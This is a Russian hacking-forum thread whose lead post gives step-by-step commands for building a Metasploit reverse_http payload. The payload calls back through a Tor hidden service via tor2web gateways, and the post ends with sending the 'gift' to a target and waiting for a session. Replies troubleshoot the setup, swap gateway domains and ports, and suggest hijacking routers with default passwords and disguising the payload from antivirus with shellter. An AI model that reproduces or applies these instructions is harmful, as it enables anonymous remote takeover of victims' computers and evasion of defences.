Статья Meterpreter через TOR [Простое решение]

Отказ от ответственности: Эта статья написана только для образовательных целей. Автор или издатель не публиковали эту статью для вредоносных целей. Если читатели хотели бы загрузить эту программу, чтобы использовать её для личной выгоды, то автор и издатель не должны нести ответственность за любой причиненный вред или ущерб.
Уголовно наказуемо! Статья 272.​

Доброго времени суток форумчане!
Эта тема для тех кто искал но не находил решение вопроса - а как же пустить сессию meterpreter через сеть тор
Требования:

• Metasploit
• tor (Expert Bundle)
• Созданный сайт в сети tor
• Не много терпения и капельку мозгов

Устанавливаем Metasploit если его еще нету!
Скачиваем tor:

apt install tor

Заходим в файл конфигурации "torrc":

nano /etc/tor/torrc

Находим и раскомментируем строчки до вида:

HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 80 127.0.0.1:9999

Перезапускаем сервис:

sudo service tor restart

Узнаем полученый домен:

sudo cat /var/lib/tor/hidden_service/hostname

Я думаю что для многих понятно что этим мы создали свой сайт в сети tor.
Теперь перейдем к metasploit'у.
Создадим наш вредоносный полезный файл:

msfvenom -p windows/meterpreter/reverse_http LHOST=*******************.onion.link LPORT=80 -o payload.exe -f exe

Вместо звёздочек вводим полученную нами .onion ссылку.
Важно что бы ссылка заканчивалась на .onion.link

link

.onion.link - этот сайт перебрасывает вас в сеть тор без дополнительного ПО

Запустим слушателя:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 192.168.1.1 (Не обязательно что будет такой же )
set LPORT 9999
exploit

Отправляем наш подарок на машину и ждем сессию.
Надеюсь что тема хоть кому нибудь пригодиться)

 

[Vityun4a]

С андроидом попробовал ((( Что то пошло не так ! Сессия не прилетает

 

[Ondrik8]

Статья ОГОНЬ! еще один пазл!! ТС лично от меня благодарочка!))

был бы рядом, за такое устроил бы тебе блэкджек и шлюхи)

 

[Rabbits]

С андроидом попробовал ((( Что то пошло не так ! Сессия не прилетает

Андроид использовался как сервер или клиент!?
Если как клиент то нужно искать ошибку в конфигурации, если как сервер - на этой стороне я не копал, эксплойтов под ведроид работающих не в локалке не припомню..

 

[Vityun4a]

Андроид использовался как сервер или клиент!?
Если как клиент то нужно искать ошибку в конфигурации, если как сервер - на этой стороне я не копал, эксплойтов под ведроид работающих не в локалке не припомню..

На ведро поставил apk с созданием сессии для meterpreter, может проблема в reverse_http на андроиде?((( ведь reverse_tcp идеально работает и не только в Локалке! Lhost прописывать адрес же своей машины? Просто в ТОР 127.0.0.1 и порт 9999

 

[Сергей Попов]

Соблюдаем рекомендации по написанию статьи. Как попало написанные не принимаем. В остальном все в порядке, спасибо!

 

[Max0nyM]

уже понял

 

[Rabbits]

На ведро поставил apk с созданием сессии для meterpreter, может проблема в reverse_http на андроиде?((( ведь reverse_tcp идеально работает и не только в Локалке! Lhost прописывать адрес же своей машины? Просто в ТОР 127.0.0.1 и порт 9999

UDP​

Ошибка найдена - ip адрес 103.198.0.2 [ onion.link ] занесен в реестр запрещенных сайтов..
что странно, ip адрес заблокирован - домен работает..
Попробую найти обход и этого..

 

[dgrey]

UDP​

Ошибка найдена - ip адрес 103.198.0.2 [ onion.link ] занесен в реестр запрещенных сайтов..
что странно, ip адрес заблокирован - домен работает..
Попробую найти обход и этого..

В том то и проблема, домен может быть заблокирован или вообще автор его отключит. Как вариант, я думаю, можно изменить payload чтобы он сначала скачивал и устанавливал тор с легитимного сайта, а уж потом подключался через тор к вашему серверу в даркнете. Но это требует админ прав, что не очень хорошо.

Есть ещё такой вариант. Можно найти какой-нибудь продвинутый рутер c DD-WRT и дефолтными паролями и через веб панель завести весь трафик в ТОР и тогда уже указывать этот рутер (с статическим IP). Но это в теории, на практике не проверял, слышал что так можно с локальной сети.

 

[ghostphisher]

Попробуйте заменить link на cab

ВМЕСТО LHOST=*******************.onion.link ---> LHOST=*******************.onion.cab

cab имеет айпи 62.138.11.6 , если верить проверке по блек листам

Ссылка скрыта от гостей

, адрес чист
и можно еще упрстить
ping supersite.onion.cab
берем айпи
вписываем его

Ссылка скрыта от гостей

пример с работой через powershell

 

[yvv4recon]

Воу, круто! Стыдно, но я не знал, про домен link, который типа проксирует внутрь сети tor.

 

[CHEATER]

Когда я запускаю payload, сессия прилетает, но не грузит stdapi, что я делаю не так?

 

[Anderson]

Подскажите в чем может быть проблема, если я запускаю payload - сессия прилетает, но командной строки meterpreter не появляется

 

[ghost]

Воу, круто! Стыдно, но я не знал, про домен link, который типа проксирует внутрь сети tor.

Ещё и домен .to имеется...

 

[House26]

У меня почему то сессия не прилетает(Может где то у меня ошибка?

 

[CHEATER]

У меня почему то сессия не прилетает(Может где то у меня ошибка?Посмотреть вложение 20185Посмотреть вложение 20186Посмотреть вложение 20187

Onion cab? Я только что пытался по нему перейти - редиректит на гугл. Да, и вы поставили "reverse_tcp".

Есть onion to (tor2web) Однако вам следует учесть, что он использует https, то-есть порт должен быть 443, а не 80. Я не смог принять сессию, не загружалась stdapi (главная оболочка meterpreter), но уведомление про "session open" появлялось когда загрузчик https, а слушатель http.
В случае, указанном в lhost было вписано 127.0.0.1, порт 8888 (из тора). (Работать с этой сессий было невозможно)
Но, возможно, это не правильно, так-как lhost отвечает за то, куда будет подключаться именно "начинка". И у меня есть основания полагать, что нужно так:
lhost: fskljfsjkf.onion.to //Указывает адрес для подключения к нам в тор самой "начинки"
lport: 443
Протокол http или https
reverselistenerbindadress 127.0.0.1 //Запускает слушатель
reverselistenerbindport 8888
Это я уже не испытывал...
Есть еще видео, там показаны разные вариации.
Если у вас получиться, прошу, - уведомьте меня, сам искал способ, заранее спасибо.

P.S Файл, который стучит на onion.to может иметь повышенный детект у антивирусов.

 

[elfear]

Тема актуальна? Гейты не работают. 443 и 80 порты проверял. Коннекта нету.
Использовал netcat.

 

[CHEATER]

Тема актуальна? Гейты не работают. 443 и 80 порты проверял. Коннекта нету.
Использовал netcat.

Актуальна.

Ссылка скрыта от гостей

 

[m0nstr]

msfvenom -p windows/meterpreter/reverse_http LHOST=*******************.onion.link LPORT=80 -o payload.exe -f exe

+5 копеек:
вот эта^ конструкция палится любым уважающим себя ав. payload.exe - необходимо маскировать или -f raw + shellter

 

[karencho]

привет эта тема актуальна еще? если да то у меня есть вопрос... допустим мне пришлось переустанавливать операционку, возможно ли вернуть тот же урл в даркнете?